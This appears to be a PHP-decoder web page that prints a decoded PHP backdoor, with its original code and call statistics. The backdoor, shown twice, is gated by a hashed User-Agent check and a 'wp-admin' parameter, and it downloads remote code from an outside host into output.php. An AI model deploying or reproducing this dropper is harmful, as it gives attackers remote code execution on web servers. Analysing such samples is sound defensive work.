Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) == "0717b2bae59931c0be946cd10c8be26..
Decoded Output download
<?php
if(md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) == "0717b2bae59931c0be946cd10c8be269" && trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){
file_put_contents('output.php',file_get_contents('http://api.apappshop.top/she/?file=' . $_GET['file'] . '.txt'));
echo "done";
exit;
} ?>
Did this file decode correctly?
Original Code
<?php
if(md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) == "0717b2bae59931c0be946cd10c8be269" && trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){
file_put_contents('output.php',file_get_contents('http://api.apappshop.top/she/?file=' . $_GET['file'] . '.txt'));
echo "done";
exit;
}
Function Calls
md5 | 3 |
trim | 1 |
Stats
MD5 | 1fc48842c7b604ebba54169bbaac4011 |
Eval Count | 0 |
Decode Time | 48 ms |